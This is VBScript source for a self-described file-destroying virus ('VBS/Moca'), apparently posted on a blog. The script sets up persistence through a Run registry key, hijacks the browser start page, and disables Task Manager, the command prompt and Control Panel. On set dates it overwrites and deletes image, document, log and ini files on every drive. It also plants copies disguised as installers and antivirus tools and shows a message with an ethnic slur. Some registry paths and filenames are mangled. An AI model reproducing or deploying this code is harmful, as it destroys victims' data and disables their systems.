rem - VBS/Moca "DL BirthDay" Virus
rem - Written by D.L. on November 8th, 2003
rem - Written by D.L. on June 24th, 2010
On Error Resume Next
dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,newFileData,copySelfComplete
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir=FSobj.GetSpecialFolder(1)
checkDate()
function checkDate()
if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then
beginInfestation()
displayMessage()
Dupler()
else
plantTrojanizedFile()
end if
end function
function plantTrojanizedFile()
set copySelf=FSobj.CreateTextFile(sysDir+"\sys-Moca.vbs")
copySelf.close
set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1)
writeCopy()
hackedFileData=replace(rawFileData,chr(42),chr(68))
fixData=replace(hackedFileData,chr(37),chr(76))
dataFixed=replace(fixData,chr(124),chr(46))
newFileData=replace(dataFixed,chr(94),"""")
set copySelfComplete=FSobj.OpenTextFile(sysDir+"\sys-Moca.vbs",2)
copySelfComplete.write newFileData
copySelfComplete.close
createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.it.polinpdg.ac.com"
createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.it.polinpdg.ac.com"
createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\sysMoca",sysDir&"\sys-Moca.vbs"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableC MD","1"," REG_DW ORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"
createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeCapti on", "THE d'commend-X - Moca-x"
createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL "
createRegKey "HKEY_CURRENT_USER/Control Panel/Mouse SwapMouseButtons", "1","REG_ DWORD"
end function
sub createRegKey(regKey,regVal)
dim regEdit
set regEdit=CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
sub beginInfestation
On Error Resume Next
dim drive,machine,complete
set machine=FSobj.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&"\")
end If
next
beginInfestation=complete
end sub
sub indexFolders(location)
On Error Resume Next
dim specs, file, subFol
set specs=FSobj.GetFolder(location)
set subFol=specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub
sub spreadData(location)
On Error Resume Next
dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete
set folder=FSobj.GetFolder(location)
set directory=folder.Files
orgMes="Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca"
mesStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))
complete=lcase(file.Name)
if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="doc")or(extName="docx") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub
function Dupler()
set Dupler = FSobj.GetFile (WScript.ScriptFull.Name)
Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\Moca.vbs" )
Dupler.Copy ("C:\Documents and Settings\All Users\StartMenu\Programs\Startup\Desktop.ini.vbs")
Dupler.Copy ("C:\Documents and Settings\AllUsers\Desktop\ Dajjal_Antivirus .exe.vbs" )
Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")
Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")
Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )
Dupler.Copy ("F:\Program\ Smadav. vbs")
Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )
Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )
Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")
Dupler.Copy ("J:\Program\ Project.vbs" )
Dupler.Copy ("J:\Program\ SM?RTP.exe.vbs" )
Dupler.Copy ("J:\Program\ %SM%RTP%.exe.vbs" )
Dupler.Copy ("K:\Program\ Moca.vbs" )
end function
function displayMessage()
dim shell,messageFile
set shell = CreateObject("WScript.Shell")
set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
messageFile.close
set FSobj=CreateObject("Scripting.FileSystemObject")
set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/Moca Virus")
messageFile.WriteLine("@cls")
messageFile.WriteLine("@@echo ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL")
messageFile.WriteLine("@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(")
messageFile.WriteLine("@echo. When you kill me...! ")
messageFile.WriteLine("@echo. i can delet all your file......! ")
messageFile.WriteLine("@echo. you can try it....@_@")
messageFile.WriteLine("@echo. say Fack for ISRAEL-say Fack for ISRAEL-say Fack for ISRAEL say-Fack for ISRAEL ")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@pause")
messageFile.close
shell.Run(sysDir&"\MocaMssg.bat")
end function
function writeCopy()
rawFileData="rem - VBS/Moca ^DL BirthDay^ Virus by *|%|" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim FSobj,winDir,sysDir" &vbcrlf& _
"set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
"set sysDir=FSobj|GetSpecialFolder(1)" &vbcrlf& _
"checkDate()" &vbcrlf& _
"function checkDate()" &vbcrlf& _
"if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then" &vbcrlf& _
"beginInfestation()" &vbcrlf& _
"displayMessage()" &vbcrlf& _
"end if" &vbcrlf& _
"end function" &vbcrlf& _
"sub beginInfestation" &vbcrlf& _
"On Error Resume Next " &vbcrlf& _
"dim drive,machine,complete" &vbcrlf& _
"set machine=FSobj|Drives " &vbcrlf& _
"for each drive in machine " &vbcrlf& _
"if (drive|DriveType=2)or(drive|DriveType=3) then" &vbcrlf& _
"indexFolders(drive|Path&^\^)" &vbcrlf& _
"end If" &vbcrlf& _
"next" &vbcrlf& _
"beginInfestation=complete" &vbcrlf& _
"end sub" &vbcrlf& _
"sub indexFolders(location)" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim specs, file, subFol" &vbcrlf& _
"set specs=FSobj|GetFolder(location)" &vbcrlf& _
"set subFol=specs|SubFolders" &vbcrlf& _
"for each file in subFol" &vbcrlf& _
"spreadData(file|Path)" &vbcrlf& _
"indexFolders(file|Path)" &vbcrlf& _
"next" &vbcrlf& _
"end sub" &vbcrlf& _
"sub spreadData(location)" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete" &vbcrlf& _
"set folder=FSobj|GetFolder(location)" &vbcrlf& _
"set directory=folder|Files" &vbcrlf& _
"finalMes=^Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca^" &vbcrlf& _
"for each file in directory" &vbcrlf& _
"extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
"complete=lcase(file|Name)" &vbcrlf& _
"if (extName=^jpg^)or(extName=^gif^)then " &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes " &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"elseIf (extName=^log^)or(extName=^ini^) then" &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes" &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"elseIf (extName=^doc^)or(extName=^exe^) then" &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes" &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"end if" &vbcrlf& _
"next" &vbcrlf& _
"end sub" &vbcrlf& _
"function displayMessage()" &vbcrlf& _
"dim shell,messageFile" &vbcrlf& _
"set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
"set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
"messageFile|close" &vbcrlf& _
"set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
"set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
"messageFile.WriteLine(^@title Happy Birthday to me! :) - VBS/Moca Virus^)" &vbcrlf& _
"messageFile.WriteLine(^@cls^)" &vbcrlf& _
"messageFile.WriteLine(^@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(^)" &vbcrlf& _
"messageFile.WriteLine(^@echo. When you kill me...! ^)" &vbcrlf& _
"messageFile.WriteLine(^@echo. i can delet all your file......! ^)" &vbcrlf& _
"messageFile.WriteLine(^@echo. you can try it....@_@^)" &vbcrlf& _
"messageFile.WriteLine(^@pause^)"&vbcrlf& _
"messageFile.close" &vbcrlf& _
"shell|Run(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
"end function"
end function
Csript Virus VBS
Related Articles
If you enjoyed this article click here, or subscribe to receive more great content just like it.
0 komentar:
Posting Komentar